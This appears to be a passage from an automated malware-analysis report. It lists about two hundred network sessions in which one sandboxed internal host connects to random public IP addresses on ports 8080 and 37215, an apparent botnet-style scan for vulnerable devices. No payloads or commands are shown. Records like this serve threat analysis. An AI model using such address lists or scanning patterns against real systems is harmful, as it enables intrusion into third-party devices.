                                                        13836192.168.2.234135853.44.48.338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13837192.168.2.235942471.234.203.118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13838192.168.2.23458868.0.196.1818080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13839192.168.2.233846631.250.149.558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13840192.168.2.2337174132.203.157.1558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13841192.168.2.234241243.188.65.2518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13842192.168.2.2350150211.224.211.658080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13843192.168.2.234208061.117.127.1318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13844192.168.2.2339738131.81.8.1398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13845192.168.2.235014267.166.162.758080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13846192.168.2.2351196168.122.216.658080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13847192.168.2.233399678.221.168.1948080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13848192.168.2.2346732220.224.178.1608080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13849192.168.2.2348654174.37.33.1698080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13850192.168.2.235636851.180.66.2058080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13851192.168.2.2334724121.172.20.758080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13852192.168.2.234633461.136.214.1418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13853192.168.2.234066878.59.209.688080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13854192.168.2.2339934218.8.232.1768080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13855192.168.2.2336068221.198.101.1678080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13856192.168.2.2349892221.39.95.2178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13857192.168.2.235501248.242.27.118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13858192.168.2.234189267.72.0.1398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13859192.168.2.2360050114.193.8.1518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13860192.168.2.234922475.229.154.2448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13861192.168.2.2334080172.101.105.678080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13862192.168.2.2351492139.108.142.2078080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13863192.168.2.2360884204.249.18.2368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13864192.168.2.2337900190.227.109.728080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13865192.168.2.2346570195.35.39.1758080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13866192.168.2.2354340148.149.202.2258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13867192.168.2.2336718164.109.89.1438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13868192.168.2.2347480110.80.209.198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13869192.168.2.2354936206.209.13.1408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13870192.168.2.2355182210.93.231.788080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13871192.168.2.235764012.37.9.2458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13872192.168.2.234226278.64.251.308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13873192.168.2.234179877.217.243.188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13874192.168.2.234225214.26.238.2358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13875192.168.2.2352142159.224.78.798080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13876192.168.2.2340164139.30.166.2278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13877192.168.2.2355374125.29.241.1568080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13878192.168.2.233905831.219.240.2188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13879192.168.2.235183235.81.187.2028080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13880192.168.2.2342492220.81.17.408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13881192.168.2.2343596114.204.232.28080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13882192.168.2.2352842186.183.150.1698080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13883192.168.2.233823879.19.207.2148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13884192.168.2.2342592128.76.14.58080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13885192.168.2.2345584129.32.175.898080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13886192.168.2.233407250.35.57.428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13887192.168.2.2358498160.202.78.2098080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13888192.168.2.235287446.247.70.1878080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13889192.168.2.2350052178.156.175.2508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13890192.168.2.2359268144.119.28.2108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13891192.168.2.2336764118.228.15.1868080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13892192.168.2.2360582156.180.124.1738080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13893192.168.2.2342874164.153.189.2398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13894192.168.2.2335644161.115.30.378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13895192.168.2.235027885.96.200.1558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13896192.168.2.233383042.172.99.878080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13897192.168.2.2359776216.224.166.1548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13898192.168.2.2349152135.128.119.568080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13899192.168.2.235674442.78.217.2458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13900192.168.2.235374812.182.219.2398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13901192.168.2.234683871.12.57.1368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13902192.168.2.234831668.127.110.578080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13903192.168.2.233724098.89.239.1538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13904192.168.2.2353048181.39.174.1378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13905192.168.2.2333580131.80.85.698080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13906192.168.2.2347926206.194.165.428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13907192.168.2.233340476.73.125.998080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13908192.168.2.2347956121.102.91.2008080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13909192.168.2.234975052.12.197.1288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13910192.168.2.233897485.73.195.2078080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13911192.168.2.2345936204.1.127.2128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13912192.168.2.2333418126.13.133.2238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13913192.168.2.235353882.186.234.558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13914192.168.2.234212824.246.78.2068080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13915192.168.2.2338822199.225.140.758080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13916192.168.2.2335914193.23.243.138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13917192.168.2.2344840213.195.164.1908080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13918192.168.2.235749635.230.7.818080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13919192.168.2.233438637.72.80.1228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13920192.168.2.2339942117.168.197.1808080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13921192.168.2.2353114120.140.16.718080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13922192.168.2.235458691.213.112.148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13923192.168.2.2359682195.112.138.1058080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13924192.168.2.2346500125.176.144.1468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13925192.168.2.2348144179.213.176.888080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13926192.168.2.235792439.179.235.2438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13927192.168.2.2349708207.93.88.548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13928192.168.2.2343880157.96.254.918080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13929192.168.2.2349218109.121.181.258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13930192.168.2.2340042159.238.172.898080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13931192.168.2.2346794173.193.53.48080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13932192.168.2.235755682.182.171.568080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13933192.168.2.234079040.79.93.538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13934192.168.2.2333510168.34.211.718080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13935192.168.2.2344662190.156.79.2248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13936192.168.2.2350738168.150.147.508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13937192.168.2.233647474.242.194.2448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13938192.168.2.2335822163.223.27.2148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13939192.168.2.2357480103.170.231.2208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13940192.168.2.2347744182.194.23.438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13941192.168.2.235007241.159.60.16637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13942192.168.2.2352932157.203.255.6237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13943192.168.2.2346608197.72.57.16837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13944192.168.2.2340120157.10.166.24837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13945192.168.2.2337188197.31.163.9937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13946192.168.2.2346082157.25.8.20537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13947192.168.2.2352306118.127.62.10437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13948192.168.2.234962481.15.44.24337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13949192.168.2.2358316157.23.149.9237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13950192.168.2.2359096157.21.90.15837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13951192.168.2.2333342197.145.212.20737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13952192.168.2.23587204.117.114.14637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13953192.168.2.2354792157.19.174.12437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13954192.168.2.2344054197.63.195.20137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13955192.168.2.2349072157.142.59.16137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13956192.168.2.2338404157.87.29.25237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13957192.168.2.234089841.38.144.20737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13958192.168.2.234151641.90.29.17337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13959192.168.2.2359580188.237.68.19637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13960192.168.2.2360016157.107.244.14937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13961192.168.2.2353022197.187.69.6937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13962192.168.2.234569041.213.38.25537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13963192.168.2.2352020197.208.102.6437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13964192.168.2.234139041.44.196.10837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13965192.168.2.235036641.84.82.11337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13966192.168.2.2360688157.18.3.037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13967192.168.2.2337242212.12.131.17137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13968192.168.2.2333626113.210.178.23237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13969192.168.2.2353110157.103.17.2037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13970192.168.2.2336236197.203.134.24337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13971192.168.2.234628841.181.253.13637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13972192.168.2.2333550197.220.7.21837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13973192.168.2.2348310157.125.51.4537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13974192.168.2.234856041.48.126.21837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13975192.168.2.2355922157.45.5.24437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13976192.168.2.2354884165.216.152.237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13977192.168.2.2347230157.74.98.5237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13978192.168.2.235133641.173.161.24937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13979192.168.2.2358138102.126.78.17337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13980192.168.2.233844839.71.15.15337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13981192.168.2.235947241.73.144.3737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13982192.168.2.2335990157.128.73.21737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13983192.168.2.235270241.105.117.20037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13984192.168.2.233850223.222.150.4537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13985192.168.2.2337954157.46.3.9137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13986192.168.2.2356178157.201.245.11337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13987192.168.2.235525441.188.54.18037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13988192.168.2.234421241.111.29.4837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13989192.168.2.2358988157.117.151.14737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13990192.168.2.2340824218.21.80.10637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13991192.168.2.234200241.157.122.2637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13992192.168.2.2335896197.212.135.18537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13993192.168.2.235475641.120.227.6237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13994192.168.2.234860441.196.180.7037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13995192.168.2.2335090197.98.99.7537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13996192.168.2.2344374197.193.40.11137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13997192.168.2.2339834157.199.231.16837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13998192.168.2.233790081.33.88.18637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13999192.168.2.2360524145.76.158.24637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14000192.168.2.235197041.16.55.19637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14001192.168.2.2332902157.82.167.18637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14002192.168.2.233874041.204.202.24237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14003192.168.2.235546841.204.91.537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14004192.168.2.2344784197.70.93.21437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14005192.168.2.2343958192.128.119.18237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14006192.168.2.233339241.16.226.13637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14007192.168.2.2348620197.58.156.21837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14008192.168.2.2336544194.53.138.16937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14009192.168.2.235074841.129.204.20137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14010192.168.2.2344208213.115.67.21637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14011192.168.2.233898634.179.252.11737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14012192.168.2.2349538157.82.140.4237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14013192.168.2.235300241.229.223.14737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14014192.168.2.2357348197.114.172.17937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14015192.168.2.2342418157.184.179.25137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14016192.168.2.2348266157.143.69.20037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14017192.168.2.2341792157.151.152.19837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14018192.168.2.2356198157.203.101.24337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14019192.168.2.2342992197.11.74.21137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14020192.168.2.2342832210.26.242.6137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14021192.168.2.2360190197.43.231.13737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14022192.168.2.235434257.201.51.11637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14023192.168.2.2333894157.230.136.3937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14024192.168.2.235674841.110.11.10637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14025192.168.2.233681441.22.32.15037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14026192.168.2.234395641.233.17.15137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14027192.168.2.2360710157.78.155.9337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14028192.168.2.233644082.115.85.237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14029192.168.2.235342641.32.132.12237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14030192.168.2.2357356157.94.215.22737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14031192.168.2.235499447.47.210.15137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14032192.168.2.2353134197.83.189.437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14033192.168.2.2337022157.132.235.4537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14034192.168.2.2346992157.198.97.6437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14035192.168.2.235127041.174.5.3237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14036192.168.2.234562276.83.4.15037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14037192.168.2.2356706197.35.209.22537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14038192.168.2.2349874124.128.225.15737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14039192.168.2.2335090157.31.145.137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14040192.168.2.2339054157.95.217.22437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14041192.168.2.2347072157.61.214.4037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14042192.168.2.2341656197.248.119.23437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14043192.168.2.235183641.124.84.19437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14044192.168.2.235309441.198.132.17637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14045192.168.2.2344674197.53.66.13337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
